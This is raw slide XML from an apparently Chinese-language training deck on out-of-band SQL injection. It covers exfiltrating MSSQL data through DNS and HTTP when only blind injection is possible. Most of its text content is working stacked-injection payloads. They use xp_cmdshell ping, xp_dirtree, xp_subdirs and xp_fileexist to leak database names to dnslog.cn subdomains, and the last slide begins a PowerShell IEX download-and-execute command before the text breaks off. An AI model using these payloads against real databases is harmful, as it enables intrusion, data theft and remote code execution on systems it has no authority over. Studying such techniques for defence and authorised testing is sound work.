              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>varchar(8000)</a:t>
            </a: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set @a=db_name(); 		#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>指定变量绑定一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mmsql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>函数</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exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "ping.exe ' +@a+ '.gddxi9.dnslog.cn -n 1"')--</a:t>
            </a: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exec('master..</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "ping.exe ' %2b@a%2b '.gddxi9.dnslog.cn -n 1"')--</a:t>
            </a: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+==&gt; %2b			#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>引用变量拼接到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>执行语句中带出数据</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="16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243743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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709775" y="1885315"/>
            <a:ext cx="12055731" cy="435766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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mysql</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堆叠注入函数 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>mysqli_multi_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>Mssql</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数据外带利用扩展存储过程：</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1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_cmdshell</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执行系统命令</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_suddirs</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查看路径下的目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_dirtree</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查询路径下所有文件和目录</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>xp_fileexist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>判断路径是否存在</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15684708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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="435766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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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注入过程：</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id=1';declare %40a varchar(8000);set %40a=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>db_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>();exec('master..</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rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> "ping.exe ' %2b@a%2b '.gddxi9.dnslog.cn -n 1"')—</a:t>
            </a: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id=1';declare @a varchar(1024);set @a=db_name();exec('master..</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xp_subdirs </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>"//'%2B@a%2B'.gddxi9.dnslog.cn\\a" ')--</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="200000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
              <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5694F484-9C7D-4F4C-AB05-FDD5AFE6C10F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7063394" y="5270029"/>
            <a:ext cx="5035575" cy="1485147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39812636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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="485010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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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注入过程：</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id=1';declare @a varchar(1024);set @a=db_name();exec('master..</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xp_dirtree </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>"//'%2B@a%2B'.x0t1df.dnslog.cn\\a" ')—</a:t>
            </a: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 id=1';declare @a varchar(1024);set @a=db_name();exec('master..</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xp_fileexist </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>"//'%2B@a%2B'.7wb9ur.dnslog.cn\\a" ')--</a:t>
            </a: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 id=1';declare @a varchar(1024);set @a=(select top 1 name from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sys.databases</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>);exec('master..</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rPr>
              <a:t>xp_fileexist</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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>"//'%2B@a%2B'.e0cwlo.dnslog.cn\\a" ')--</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33205835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a:t>注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="文本框 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="323427" y="1185334"/>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注入数据外带</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="文本框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709776" y="1885315"/>
            <a:ext cx="11482225" cy="435766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a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>当注入点仅存在盲注时，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>sqlmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>出数据太慢，使用数据外带加速出数据。</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1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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存在堆叠注入数据外带</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" b="1"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注入过程：</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id=1';DECLARE @a varchar(8000);SET @a=db_name();exec('master..</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xp_cmdshell </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>powershell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t> IEX (new-object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>net.webclient</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>).</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0" err="1">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:cs typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:rPr>
              <a:t>downloadstring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
